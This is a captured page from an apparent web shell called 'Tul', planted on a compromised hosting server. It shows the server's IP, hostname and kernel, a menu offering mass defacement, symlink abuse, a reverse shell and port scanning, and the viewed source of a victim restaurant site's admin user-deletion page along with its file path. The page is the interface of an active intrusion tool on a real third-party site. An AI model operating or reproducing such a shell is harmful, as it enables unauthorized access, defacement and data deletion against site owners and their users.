Tul xxx Tul
User / IP
:
216.73.216.95
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
invitados
/
condorburguer
/
admin
/
Viewing: users_accounts.php
<?php include '../components/connect.php'; session_start(); $admin_id = $_SESSION['admin_id']; if(!isset($admin_id)){ header('location:admin_login.php'); } if(isset($_GET['delete'])){ $delete_id = $_GET['delete']; $delete_users = $conn->prepare("DELETE FROM `users` WHERE id = ?"); $delete_users->execute([$delete_id]); $delete_order = $conn->prepare("DELETE FROM `orders` WHERE user_id = ?"); $delete_order->execute([$delete_id]); $delete_cart = $conn->prepare("DELETE FROM `cart` WHERE user_id = ?"); $delete_cart->execute([$delete_id]); header('location:users_accounts.php'); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Users Accounts</title> <link rel="icon" href="images/LYgjKqzpQb.ico" type="image/x-icon"> <!-- font awesome cdn link --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"> <!-- custom css file link --> <link rel="stylesheet" href="../css/admin_style.css"> </head> <body style="background-image: url('images/2016_09_29_12990_1475116504._large.jpg'); background-size: cover; background-position: center; background-repeat: no-repeat;"> <?php include '../components/admin_header.php' ?> <!-- user accounts section starts --> <section class="accounts"> <h1 class="heading">users account</h1> <div class="box-container"> <?php $select_account = $conn->prepare("SELECT * FROM `users`"); $select_account->execute(); if($select_account->rowCount() > 0){ while($fetch_accounts = $select_account->fetch(PDO::FETCH_ASSOC)){ ?> <div class="box"> <p> user id : <span><?= $fetch_accounts['id']; ?></span> </p> <p> username : <span><?= $fetch_accounts['name']; ?></span> </p> <a href="users_accounts.php?delete=<?= $fetch_accounts['id']; ?>" class="delete-btn" onclick="return confirm('delete this account?');">delete</a> </div> <?php } }else{ echo '<p class="empty">no accounts available</p>'; } ?> </div> </section> <!-- user accounts section ends --> <!-- custom js file link --> <script src="../js/admin_script.js"></script> </body> </html>
Coded With 💗 by
0x6ick